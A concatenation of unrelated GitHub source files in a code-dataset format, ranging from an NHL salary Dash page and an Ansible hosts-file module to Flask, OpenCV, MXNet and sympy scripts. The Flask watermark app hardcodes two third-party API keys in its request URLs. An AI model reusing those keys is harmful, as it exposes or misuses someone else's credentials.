career_points_slider\n career_points_input_output = career_points_input\n career_shots_slider_output = career_shots_slider\n career_shots_input_output = career_shots_input\n career_timeOnIce_slider_output = career_timeOnIce_slider\n career_timeOnIce_input_output = career_timeOnIce_input\n career_evenTimeOnIce_slider_output = career_evenTimeOnIce_slider\n career_evenTimeOnIce_input_output = career_evenTimeOnIce_input\n career_powerPlayTimeOnIcePerGame_slider_output = career_powerPlayTimeOnIcePerGame_slider\n career_powerPlayTimeOnIcePerGame_input_output = career_powerPlayTimeOnIcePerGame_input\n career_powerPlayTimeOnIce_slider_output = career_powerPlayTimeOnIce_slider\n career_powerPlayTimeOnIce_input_output = career_powerPlayTimeOnIce_input\n career_powerPlayPoints_slider_output = career_powerPlayPoints_slider\n career_powerPlayPoints_input_output = career_powerPlayPoints_input\n powerPlayTimeOnIcePerGame22_slider_output = powerPlayTimeOnIcePerGame22_slider\n powerPlayTimeOnIcePerGame22_input_output = powerPlayTimeOnIcePerGame22_input\n assists22_slider_output = assists22_slider\n assists22_input_output = assists22_input\n\n career_assists_slider_output, career_assists_input_output = check_for_update(\n career_assists_slider, career_assists_input, career_assists_slider_output, career_assists_input_output)\n career_points_slider_output, career_points_input_output = check_for_update(\n career_points_slider, career_points_input, career_points_slider_output, career_points_input_output)\n career_shots_slider_output, career_shots_input_output = check_for_update(\n career_shots_slider, career_shots_input, career_shots_slider_output, career_shots_input_output)\n career_timeOnIce_slider_output, career_timeOnIce_input_output = check_for_update(\n career_timeOnIce_slider, career_timeOnIce_input, career_timeOnIce_slider_output, career_timeOnIce_input_output)\n career_evenTimeOnIce_slider_output, career_evenTimeOnIce_input_output = check_for_update(\n career_evenTimeOnIce_slider, career_evenTimeOnIce_input, career_evenTimeOnIce_slider_output,\n career_evenTimeOnIce_input_output)\n career_powerPlayTimeOnIcePerGame_slider_output, career_powerPlayTimeOnIcePerGame_input_output = check_for_update(\n career_powerPlayTimeOnIcePerGame_slider, career_powerPlayTimeOnIcePerGame_input,\n career_powerPlayTimeOnIcePerGame_slider_output, career_powerPlayTimeOnIcePerGame_input_output)\n career_powerPlayTimeOnIce_slider_output, career_powerPlayTimeOnIce_input_output = check_for_update(\n career_powerPlayTimeOnIce_slider, career_powerPlayTimeOnIce_input, career_powerPlayTimeOnIce_slider_output,\n career_powerPlayTimeOnIce_input_output)\n career_powerPlayPoints_slider_output, career_powerPlayPoints_input_output = check_for_update(\n career_powerPlayPoints_slider, career_powerPlayPoints_input, career_powerPlayPoints_slider_output,\n career_powerPlayPoints_input_output)\n powerPlayTimeOnIcePerGame22_slider_output, powerPlayTimeOnIcePerGame22_input_output = check_for_update(\n powerPlayTimeOnIcePerGame22_slider, powerPlayTimeOnIcePerGame22_input,\n powerPlayTimeOnIcePerGame22_slider_output, powerPlayTimeOnIcePerGame22_input_output)\n assists22_slider_output, assists22_input_output = check_for_update(\n assists22_slider, assists22_input, assists22_slider_output, assists22_input_output)\n\n data_map = {\n 'career_assists': career_assists_slider_output,\n 'career_points': career_points_slider_output,\n 'career_powerPlayTimeOnIcePerGame': career_powerPlayTimeOnIcePerGame_slider_output,\n 'career_shots': career_shots_slider_output,\n 'career_powerPlayTimeOnIce': career_powerPlayTimeOnIce_slider_output,\n 'career_powerPlayPoints': career_powerPlayPoints_slider_output,\n 'assists22': assists22_slider_output,\n 'career_timeOnIce': career_timeOnIce_slider_output,\n 'career_evenTimeOnIce': career_evenTimeOnIce_slider_output,\n 'powerPlayTimeOnIcePerGame22': powerPlayTimeOnIcePerGame22_slider_output\n }\n\n X = pd.DataFrame.from_dict(data_map, orient='index').T\n\n pred = clf.predict(X)\n pred = \"${:,.2f}\".format(round(pred[0]))\n\n basic_predicted_salary_output = pred\n\n return career_assists_slider_output, career_assists_input_output, career_points_slider_output, \\\n career_points_input_output, career_shots_slider_output, career_shots_input_output, \\\n career_timeOnIce_slider_output, career_timeOnIce_input_output, career_evenTimeOnIce_slider_output, \\\n career_evenTimeOnIce_input_output, career_powerPlayTimeOnIcePerGame_slider_output, \\\n career_powerPlayTimeOnIcePerGame_input_output, career_powerPlayTimeOnIce_slider_output, \\\n career_powerPlayTimeOnIce_input_output, career_powerPlayPoints_slider_output, \\\n career_powerPlayPoints_input_output, powerPlayTimeOnIcePerGame22_slider_output, \\\n powerPlayTimeOnIcePerGame22_input_output, assists22_slider_output, assists22_input_output, \\\n basic_predicted_salary_output\n","repo_name":"kyledufrane/NHL-Salary-Predictions","sub_path":"dash/pages/player_worth.py","file_name":"player_worth.py","file_ext":"py","file_size_in_byte":11224,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"31909531330","text":"from __future__ import absolute_import, division, print_function\n\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n \"metadata_version\": \"1.1\",\n \"status\": [\"stableinterface\"],\n \"supported_by\": \"EDB\",\n}\n\nDOCUMENTATION = \"\"\"\n---\nmodule: hosts_lines\nshort_description: Ensure that the given entries exist in /etc/hosts\ndescription:\n - Takes a path and a list of lines and ensures that each entry exists in the\n file, removing any older entries for matching IP addresses or hostnames.\n Appends any lines that are not already in the file.\nversion_added: \"2.8\"\noptions:\n path:\n description:\n - The path to an existing file\n required: true\n lines:\n description:\n - An array of hosts entries that must exist in the file\n required: true\nauthor: \"Abhijit Menon-Sen \"\n\"\"\"\n\nEXAMPLES = \"\"\"\n- hosts_lines:\n path: /etc/hosts\n lines:\n - 127.0.0.1 localhost\n - 192.0.2.1 example.com\n\"\"\"\n\nimport traceback\nimport tempfile\nimport os\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils._text import to_bytes, to_native\n\n\ndef hosts_lines(module):\n m = {}\n\n path = module.params.get(\"path\")\n diff = {\n \"before\": \"\",\n \"after\": \"\",\n \"before_header\": \"%s (content)\" % path,\n \"after_header\": \"%s (content)\" % path,\n }\n\n # Given a list of lines that may include comments, blank lines (which don't\n # do anything useful), and valid hosts entries comprising an IP address and\n # one or more hostnames separated by spaces. We build up the sets of lines,\n # addresses, and hostnames that we need to check existing hosts entries to\n # see if they need to be replaced.\n\n lines = set()\n to_replace = set()\n\n for l in module.params.get(\"lines\"):\n lines.add(l)\n\n if not l.lstrip().startswith(\"#\"):\n words = l.split()\n for n in words:\n to_replace.add(n)\n\n before_lines = []\n after_lines = []\n changes = []\n\n try:\n b_path = to_bytes(path, errors=\"surrogate_or_strict\")\n with open(b_path, \"r\") as f:\n before_lines = f.readlines()\n\n for line in before_lines:\n l = line.rstrip(\"\\r\\n\")\n\n # If a line we want is already there, we copy it to the output and\n # remove it from the list of lines to append. If the line contains\n # an address or name that overlaps with an entry we are adding, we\n # skip it. Otherwise we copy it over unmodified.\n\n if l in lines:\n lines.remove(l)\n\n elif not l.lstrip().startswith(\"#\"):\n words = l.split()\n if set(words) & to_replace:\n changes.append(\"skip\")\n continue\n\n after_lines.append(line)\n\n if lines:\n changes.append(\"append\")\n for l in lines:\n after_lines.append(l + \"\\n\")\n\n # If we didn't need to skip any existing lines, we can just append the\n # new lines to /etc/hosts. Otherwise we must replace the file, which we\n # prefer to do by writing to a temporary file and using atomic_move; but\n # that doesn't work on Docker containers, so we must overwrite in-place.\n\n if changes and not module.check_mode:\n contents = to_bytes(\"\".join(after_lines))\n\n if \"skip\" in changes and module.params[\"platform\"] == \"docker\":\n m[\"operation\"] = \"overwrite\"\n with open(b_path, \"wb\") as f:\n f.write(contents)\n\n elif \"skip\" in changes:\n m[\"operation\"] = \"replace\"\n tmpfd, tmpfile = tempfile.mkstemp()\n with os.fdopen(tmpfd, \"wb\") as f:\n f.write(contents)\n module.atomic_move(\n tmpfile,\n to_native(b_path),\n unsafe_writes=module.params[\"unsafe_writes\"],\n )\n\n else:\n m[\"operation\"] = \"append\"\n contents = to_bytes(\"\".join(map(lambda l: l + \"\\n\", lines)))\n with open(b_path, \"ab\") as f:\n f.write(contents)\n except Exception as e:\n module.fail_json(msg=str(e), exception=traceback.format_exc())\n\n diff[\"before\"] = \"\".join(before_lines)\n diff[\"after\"] = \"\".join(after_lines)\n m[\"diff\"] = [diff, []]\n m[\"changed\"] = bool(changes)\n\n return m\n\n\ndef main():\n module = AnsibleModule(\n argument_spec=dict(\n path=dict(type=\"path\", required=True),\n lines=dict(type=\"list\", required=True),\n unsafe_writes=dict(type=\"bool\"),\n platform=dict(type=\"str\"),\n ),\n supports_check_mode=True,\n )\n\n module.exit_json(**hosts_lines(module))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"EnterpriseDB/tpa","sub_path":"library/hosts_lines.py","file_name":"hosts_lines.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"37"} +{"seq_id":"35808751047","text":"'''\nPrint the smallest positive number that is evenly divisible by all of the numbers from 1 to 20\n'''\n\ndef is_divisible(num: int):\n for x in range(20):\n if num % (x + 1) is not 0:\n return False\n return True\n\n\ndef until_divisible():\n total = 20\n while not is_divisible(total):\n total += 20\n return total\n\n\nprint(until_divisible())\n\n","repo_name":"Jcvita/projecteulermultilingual","sub_path":"python/005smallestmultiple.py","file_name":"005smallestmultiple.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14090285538","text":"contm = contf = contmaior = r = 0\r\nwhile True:\r\n r = \" \"\r\n sexo = \" \"\r\n while sexo not in \"MF\":\r\n sexo = str(input(\"Insira o sexo da pessoa: [M/F]\")).upper().split()[0]\r\n idade = int(input(\"Insira a idade da pessoa: \"))\r\n if sexo == \"M\":\r\n contm += 1\r\n if sexo == \"F\" and idade < 20:\r\n contf += 1\r\n if idade > 18:\r\n contmaior += 1\r\n while r not in \"SN\":\r\n r = str(input(\"Você deseja continuar? [S/N] \")).upper().strip()[0]\r\n if r == \"N\":\r\n break\r\nprint(f\"a) O total de pessoas maiores de idade é de {contmaior}\")\r\nprint(f\"b) O número de homens cadastrados foi de {contm}\")\r\nprint(f\"c) O número de mulheres menores de 20 anos foi de {contf}\")\r\n","repo_name":"LucasAlmeidaBerta/Desafios-de-Python","sub_path":"Desafio 69.py","file_name":"Desafio 69.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74376504108","text":"#!/usr/bin/python3\n\nimport cv2\nimport numpy as np\n\n\ndog = cv2.imread(\"dog.jpg\")\ncat = cv2.imread(\"cat.jpg\")\n\n\n# print shapes of both pictures\n\nprint(dog.shape)\nprint(cat.shape)\n\ncv2.imshow(\"dog_image\",dog)\ncv2.imshow(\"cat_image\",cat)\n\n#after tracing both pics lets takeout the nose of dog and fix it on equal sized nose of cat\n\n#taking about 20*20 of both pics (dog has nose somewhere around 131*138)\ndog_nose = dog[121:141,128:148]\n\n#pic of dog's nose\n#cv2.imshow(\"dog_nose\",dog_nose)\n\n#takeout equal piece of 20*20 cat's nose so that the cat nose can be replaced by dogs and dogs by nose of cat\ncat_nose = cat[131:151,88:108]\n\n#pic of cat's nose\ncv2.imshow(\"cat_nose\",cat_nose)\n\n\n#adding nose of dog on cat (iamge of dogs nose overwritten on nose of cat) \nnose_add = cv2.addWeighted(cat_nose,.01,dog_nose,1,1)\n#dog_nose.copyTo(cat_nose)\n\n\n# trying to add portions passing values of dog_nose to cat_nose\ncat_nose = dog_nose\n\n# by now the actual cat_nose is replaced by that of dog's_nose\n\n# to see if the values of dog's_nose passed to cat's_nose or not\nif cat_nose.all == dog_nose.all:\n\timage = cv2.add(cat_nose,cat_nose)\n\tcv2.imwrite(\"new_cat.jpeg\",image)\n\tprint(\"matched\")\n\n\n\n# ie match whereever the color is reddish do black over there using numpy integrated with cv2\n#cat[np.where((cat == [255,255,255]).all(axis = 2))] = [0,0,0]\n\n#changing the color wherever cat is white do it black over there and save as output.png\ncat[np.where(cv2.inRange(cat,(100,100,100),(230,230,230)))] = [0,0,0]\ncv2.imwrite('output.png', cat)\n\n#cv2.imshow(\"new_cat_nose\",cat_nose)\ncv2.imshow(\"new_cat\",cat)\n\n\ncv2.waitKey(0)\ncv2.destroyAllWindows() \n","repo_name":"Bhavya-Agrawal/Computer_vision_projects","sub_path":"image_overlapping.py","file_name":"image_overlapping.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42787100624","text":"import numpy as np\nfrom gurobipy import *\nimport multiprocessing\n\nfrom multiprocessing import Pool\nfrom multiprocessing import set_start_method\nfrom multiprocessing.managers import BaseManager\n\ndef create_model(i):\n mp = Model(\"item_{}\".format(i))\n x1 = mp.addVar(lb=0)\n x2 = mp.addVar(lb=0)\n mp.addConstr(x1 + 2 * x2 <= i, name=\"constr_1\")\n mp.addConstr(2 * x1 + x2 <= i, name=\"constr_2\")\n mp.setObjective(x1 + x2, sense=GRB.MAXIMIZE)\n mp.update()\n return mp\n\ndef solve_model(i):\n # mp = Model(\"item_{}\".format(i))\n # x1 = mp.addVar(lb=0)\n # x2 = mp.addVar(lb=0)\n # mp.addConstr(x1 + 2 * x2 <= i, name=\"constr_1\")\n # mp.addConstr(2 * x1 + x2 <= i, name=\"constr_2\")\n # mp.setObjective(x1 + x2, sense=GRB.MAXIMIZE)\n # mp.update()\n # mp.optimize()\n global model_list\n mp = model_list[i]\n mp.optimize()\n\n return mp.objVal\n\n# test the multiprocessing idea\nif __name__ == '__main__':\n global model_list\n set_start_method(\"fork\")\n model_list = []\n for i in range(3):\n mp = create_model(i + 1)\n model_list.append(mp)\n\n with Pool(3) as p:\n model_results = p.map(solve_model, [0, 1, 2])\n\n print(model_results)","repo_name":"haoxiangyang89/prod_distributed","sub_path":"src/multiprocess_test.py","file_name":"multiprocess_test.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"722220245","text":"from __future__ import absolute_import\n\nimport re\nimport ctypes\nimport logging\nfrom math import sqrt\n\nfrom .ndarray import NDArray\nfrom .base import NDArrayHandle, py_str\nfrom . import ndarray\n\n\nclass Monitor(object):\n \"\"\"Monitor outputs, weights, and gradients for debugging.\n\n Parameters\n ----------\n interval : int\n Number of batches between printing.\n stat_func : function\n A function that computes statistics of tensors.\n Takes an `NDArray` and returns an `NDArray`. Defaults to mean\n absolute value |x|/size(x).\n pattern : str\n A regular expression specifying which tensors to monitor.\n Only tensors with names that match `name_pattern` will be included.\n For example, '.*weight|.*output' will print all weights and outputs and\n '.*backward.*' will print all gradients.\n \"\"\"\n def __init__(self, interval, stat_func=None, pattern='.*', sort=False):\n if stat_func is None:\n def asum_stat(x):\n \"\"\"returns |x|/size(x), async execution.\"\"\"\n return ndarray.norm(x)/sqrt(x.size)\n stat_func = asum_stat\n self.stat_func = stat_func\n self.interval = interval\n self.activated = False\n self.queue = []\n self.step = 0\n self.exes = []\n self.re_prog = re.compile(pattern)\n self.sort = sort\n def stat_helper(name, array):\n \"\"\"wrapper for executor callback\"\"\"\n array = ctypes.cast(array, NDArrayHandle)\n array = NDArray(array, writable=False)\n if not self.activated or not self.re_prog.match(py_str(name)):\n return\n self.queue.append((self.step, py_str(name), self.stat_func(array)))\n self.stat_helper = stat_helper\n\n def install(self, exe):\n \"\"\"install callback to executor.\n Supports installing to multiple exes.\n\n Parameters\n ----------\n exe : mx.executor.Executor\n The Executor (returned by symbol.bind) to install to.\n \"\"\"\n exe.set_monitor_callback(self.stat_helper)\n self.exes.append(exe)\n\n def tic(self):\n \"\"\"Start collecting stats for current batch.\n Call before calling forward.\"\"\"\n if self.step % self.interval == 0:\n for exe in self.exes:\n for array in exe.arg_arrays:\n array.wait_to_read()\n for array in exe.aux_arrays:\n array.wait_to_read()\n self.queue = []\n self.activated = True\n self.step += 1\n\n\n def toc(self):\n \"\"\"End collecting for current batch and return results.\n Call after computation of current batch.\n\n Returns\n -------\n res : list of \"\"\"\n if not self.activated:\n return []\n for exe in self.exes:\n for array in exe.arg_arrays:\n array.wait_to_read()\n for array in exe.aux_arrays:\n array.wait_to_read()\n for exe in self.exes:\n for name, array in zip(exe._symbol.list_arguments(), exe.arg_arrays):\n if self.re_prog.match(name):\n self.queue.append((self.step, name, self.stat_func(array)))\n for name, array in zip(exe._symbol.list_auxiliary_states(), exe.aux_arrays):\n if self.re_prog.match(name):\n self.queue.append((self.step, name, self.stat_func(array)))\n self.activated = False\n res = []\n if self.sort:\n self.queue.sort(key=lambda x: x[1])\n for n, k, v_list in self.queue:\n if isinstance(v_list, NDArray):\n v_list = [v_list]\n assert isinstance(v_list, list)\n s = ''\n for v in v_list:\n assert isinstance(v, NDArray)\n if v.shape == (1,):\n s += str(v.asscalar()) + '\\t'\n else:\n s += str(v.asnumpy()) + '\\t'\n res.append((n, k, s))\n self.queue = []\n return res\n\n def toc_print(self):\n \"\"\"End collecting and print results.\"\"\"\n res = self.toc()\n for n, k, v in res:\n logging.info('Batch: {:7d} {:30s} {:s}'.format(n, k, v))\n","repo_name":"hpi-xnor/BMXNet","sub_path":"python/mxnet/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4267,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"5695850017","text":"from collections import deque\nimport datetime\nfrom msa.core.event_handler import EventHandler\nfrom msa.core import get_supervisor\nfrom msa.builtins.signals import events\n\n\nclass StartupEventTrigger(EventHandler):\n \"\"\"\n Fires off a startup event and then exits\n \"\"\"\n\n def __init__(self, loop, event_bus, logger, config=None):\n super().__init__(loop, event_bus, logger, config)\n\n async def init(self):\n # trigger startup hook later\n self.loop.call_later(1, self.trigger_event)\n\n def trigger_event(self):\n new_event = events.StartupEvent()\n new_event.init(\n {\"timestamp\": datetime.datetime.now().strftime(\"%Y-%m-%d, %H:%M:%S:%f\")}\n )\n get_supervisor().fire_event(new_event)\n\n\nclass NetworkPropagateEventHandler(EventHandler):\n def __init__(self, loop, event_bus, logger, config=None):\n super().__init__(loop, event_bus, logger, config)\n\n event_bus.subscribe(\".*\", self.handle)\n\n self.buffered_events = deque(maxlen=10)\n\n async def handle(self, event):\n\n if isinstance(event, events.RequestDisburseEventsToNetworkEvent):\n self.handle_disburse_request()\n return\n\n if not event._network_propagate:\n return\n\n self.buffered_events.append(event)\n\n def handle_disburse_request(self):\n new_event = events.DisburseEventsToNetworkEvent().init(\n {\"events\": [event.get_metadata() for event in self.buffered_events]}\n )\n self.buffered_events.clear()\n get_supervisor().fire_event(new_event)\n","repo_name":"MichaelGrabinski/moe-serifu-agent","sub_path":"python/msa/builtins/signals/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"26428021648","text":"from sympy import symbols, diag\nfrom simbolics import simpLong, outputExprLong\n\nfrom fkcm.fk1cmS import fk1cmS\nfrom fkcm.fk2cmS import fk2cmS\nfrom fkcm.fk3cmS import fk3cmS\nfrom fkcm.fk4cmS import fk4cmS\nfrom fkcm.fk5cmS import fk5cmS\nfrom fkcm.fk6cmS import fk6cmS\nfrom fkcm.fk7cmS import fk7cmS\n\nfrom Jcm.J1cmS import J1cmS\nfrom Jcm.J2cmS import J2cmS\nfrom Jcm.J3cmS import J3cmS\nfrom Jcm.J4cmS import J4cmS\nfrom Jcm.J5cmS import J5cmS\nfrom Jcm.J6cmS import J6cmS\nfrom Jcm.J7cmS import J7cmS\n\ntt0, tt1, tt2, tt3, tt4, tt5, tt6, tt7 = symbols(\"tt0 tt1 tt2 tt3 tt4 tt5 tt6 tt7\")\n\ndef split(J):\n return J[:3, :], J[:3, :]\n\nJ1cm = J1cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nJ2cm = J2cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nJ3cm = J3cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nJ4cm = J4cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nJ5cm = J5cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nJ6cm = J6cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nJ7cm = J7cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\n\n(J1cmv, J1cmw), (J2cmv, J2cmw), (J3cmv, J3cmw), (J4cmv, J4cmw), (J5cmv, J5cmw), (J6cmv, J6cmw), (J7cmv, J7cmw) = split(J1cm), split(J2cm), split(J3cm), split(J4cm), split(J5cm), split(J6cm), split(J7cm)\n\nfk1cm = fk1cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nfk2cm = fk2cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nfk3cm = fk3cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nfk4cm = fk4cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nfk5cm = fk5cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nfk6cm = fk6cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\nfk7cm = fk7cmS(tt1, tt2, tt3, tt4, tt5, tt6, tt7)\n\nR1cm = fk1cm[:3,:3]\nR2cm = fk2cm[:3,:3]\nR3cm = fk3cm[:3,:3]\nR4cm = fk4cm[:3,:3]\nR5cm = fk5cm[:3,:3]\nR6cm = fk6cm[:3,:3]\nR7cm = fk7cm[:3,:3]\n\nI1cm = diag(0.033, 0.0333, 0.0123)\nI2cm = diag(0.0305, 0.0304, 0.011)\nI3cm = diag(0.025, 0.0238, 0.0076)\nI4cm = diag(0.017, 0.0164, 0.006)\nI5cm = diag(0.01, 0.0087, 0.00449)\nI6cm = diag(0.0049, 0.0047, 0.0036)\nI7cm = diag(0.001, 0.001, 0.001)\n\ndef simpMul(core_expr, le, re):\n expr = core_expr\n\n for i in range(len(le)):\n print(\"left wing\")\n print(\"member\", i)\n expr = le[len(le)-1 - i] * expr\n expr = simpLong(expr)\n\n for i in range(len(re)):\n print(\"right wing\")\n print(\"member\", i)\n expr = expr * re[i] \n expr = simpLong(expr)\n \n return expr\n\nfor Jcmw, Rcm, expr_name in zip([J1cmw, J2cmw, J3cmw, J4cmw, J5cmw, J6cmw, J7cmw], [R1cm, R2cm, R3cm, R4cm, R5cm, R6cm, R7cm], [\"M2\"+str(i+1) for i in range(7)]):\n print(\"simplify\", expr_name)\n fk = simpMul(I1cm, [Jcmw.transpose(), Rcm], [Rcm.transpose(), Jcmw ])\n outputExprLong(expr_name, fk)\n\n\n","repo_name":"gintautas12358/LBR_kinematics","sub_path":"forwardDynamicsMparts2.py","file_name":"forwardDynamicsMparts2.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1898177959","text":"import numpy as np\n\ndef make_train_mat(mininew, AS, D, SL):\n # D = D / 2 # Uncomment this line if D needs to be halved as in the MATLAB script\n miniTr = np.zeros((D, SL))\n noiseTr = np.zeros((D, SL))\n\n for n in range(D):\n tmp = np.random.randint(0, len(AS) - SL)\n miniTr[n, :] = AS[tmp:tmp + SL] + (mininew[n, :]) * 10\n\n for n in range(D):\n tmp2 = np.random.randint(0, len(AS) - SL)\n noiseTr[n, :] = AS[tmp2:tmp2 + SL]\n\n # Concatenate mini and noise sweeps into the training matrix\n mnTr = np.concatenate((miniTr, noiseTr), axis=0)\n\n # Target matrix\n\n mnTa = np.concatenate((np.ones((D,1), dtype=int), np.zeros((D,1), dtype=int)), axis = 0)\n mnTa = np.ravel(mnTa)\n\n return mnTr, mnTa\n\n","repo_name":"mrreganwang/Mini_Scripts","sub_path":"python/helper_functions/MakeTrainMat.py","file_name":"MakeTrainMat.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41670373870","text":"\"\"\"2次元データの補間\"\"\"\n\nimport numpy as np\nfrom scipy.interpolate import interpn\n\ndef f(x, y):\n return 2 * x**3 + 3 * y**2\n\n## 元グリッド座標\nx = np.linspace(1, 4, 6)\ny = np.linspace(4, 7, 6)\n#print(type(x),len(x))\n\n## 2次元データ\ndata = f(*np.meshgrid(x, y, indexing='ij', sparse=True))\n\n## 補間先のグリッド座標\nx2 = np.linspace(2, 3, 3)\ny2 = np.linspace(5, 6, 3)\nxy2 = np.array(np.meshgrid(x2,y2)).transpose((1,2,0))\n\nresult = interpn([x,y], data, xy2 )\n\nfor j in range(3):\n for i in range(3):\n print(result[i,j],f(x2[i],y2[j]))\n","repo_name":"mokkei1978/mytool","sub_path":"python/scipy/interp2d.py","file_name":"interp2d.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33661792106","text":"import glob\nimport os\nfrom io import BytesIO\n\nimport boto3\nimport requests\nfrom PIL import Image\nfrom flask import Flask, render_template, request, flash\nfrom requests.api import get\nfrom werkzeug.utils import secure_filename\n\napp = Flask(__name__)\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nUPLOAD_DIR = os.path.join(ROOT_DIR, \"static\")\napp.config['UPLOAD_FOLDER'] = UPLOAD_DIR\n\n# create 'static' folder if not exists\nif not os.path.exists(UPLOAD_DIR):\n os.mkdir(UPLOAD_DIR)\n\n# configure boto3 client\ns3_client = boto3.client('s3')\n\n\n# utility functions\ndef get_s3_url(bucket_name, filename):\n return f\"https://{bucket_name}.s3.amazonaws.com/{filename}\"\n\n\ndef request_and_save(url, filename):\n req = requests.get(url)\n\n im = Image.open(BytesIO(req.content))\n path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n im.save(path, \"PNG\")\n\n return path\n\n# app endpoints\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n\n filename = None\n if request.method == 'POST':\n f = request.files['file']\n filename = secure_filename(f.filename)\n f.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n return render_template('upload.html', filename=filename)\n\n\n@app.route('/watermark', methods=['POST'])\ndef apply_watermark():\n bucket_name = \"cgcscaleup3\" # INSERT YOUR BUCKET NAME\n\n filename = request.form['filename']\n path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n r1 = s3_client.upload_file(path, bucket_name, filename, ExtraArgs={'ACL': 'public-read'})\n\n #bucket_url = 'https://cgcscaleup3.s3.us-east-2.amazonaws.com/' + filename\n\n image_url = get_s3_url(bucket_name=bucket_name, filename=filename)\n\n # api key P23OWF071I39S6QUR2EL9MDT74B165JX48CKYZ8N0A5VHG\n # GENERATE REQUEST FOR QRACKAJACK\n qr_req_url = f'https://qrackajack.expeditedaddons.com/?api_key=P23OWF071I39S6QUR2EL9MDT74B165JX48CKYZ8N0A5VHG&content={image_url}'\n\n qr_name = f\"qr_{filename}\"\n qr_path = request_and_save(qr_req_url, qr_name)\n\n r2 = s3_client.upload_file(qr_path, bucket_name, qr_name, ExtraArgs={'ACL': 'public-read'})\n\n qr_url = get_s3_url(bucket_name, qr_name)\n\n\n # GENERATE REQUEST FOR WATERMARKER\n # warermarker api key \"5VYN48U9MFBOIR96Q1J40PWTHD23A5XG13C87Z2KES0L67\"\n watermark_req_url = f\"https://watermarker.expeditedaddons.com?api_key=5VYN48U9MFBOIR96Q1J40PWTHD23A5XG13C87Z2KES0L67&image_url={image_url}&watermark_url={qr_url}&opacity=50&position=center&width=100&height=100\"\n\n watermark_name = f\"watermark_{filename}\"\n request_and_save(watermark_req_url, watermark_name)\n\n print(\"watermark done\")\n\n # clean bucket\n s3_client.delete_object(Bucket=bucket_name, Key=qr_name)\n\n return render_template(\"upload.html\", filename=watermark_name)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"lilf4p/cgc-scaleup3","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10290092858","text":"from . import util, spotify, youtube\nimport youtube_dl\nimport os\nimport sys\nimport requests\nimport argparse\nimport logging\n\nlog = logging.getLogger('spytube')\nlogging.basicConfig(level=50)\t\t# CRITICAL 50, ERROR 40, WARNING 30, INFO 20, DEBUG 10, NOTSET 0\n\ntry:\n\tfrom mutagen.mp3 import MP3\n\tfrom mutagen.id3 import ID3, APIC, TIT2, TIT3, TPE1, TPE2, TALB, TPOS, TRCK, COMM\nexcept ImportError:\n log.critical(\"unable to import mutagen. install it to add id3 tags\") \n\nVERSION = \"0.1.5\"\nINVALID_CHARS = '<>:\"/\\|?*'\n\n\nclass Spytube(object):\n\tdef __init__(self, **kwargs):\n\t\tself.kwargs = kwargs\n\t\tself.folder_path = os.path.expanduser(kwargs[\"path\"] or util.CONFIG[\"DEFAULT\"][\"music_folder_path\"])\n\t\tif kwargs[\"token\"]:\n\t\t\tself.sp = spotify.Spotify(token = kwargs[\"token\"])\n\t\telse:\n\t\t\tself.sp = spotify.Spotify(util.CONFIG[\"DEFAULT\"][\"spotify_username\"],\n\t\t\t\t\t\t\t\t\tutil.CONFIG[\"DEFAULT\"][\"spotify_client_id\"],\n\t\t\t \t\t\t\t\t\tutil.CONFIG[\"DEFAULT\"][\"spotify_client_secret\"],\n\t\t\t \t\t\t\t\t\tutil.CONFIG[\"DEFAULT\"][\"spotify_redirect_uri\"])\n\t\tself.yt = youtube.Youtube(util.CONFIG[\"DEFAULT\"][\"youtube_api_key\"])\n\t\tself.sp_tracklist = None\n\n\tdef start(self):\n\t\tif self.sp:\n\t\t\tlog.debug(\"initialized 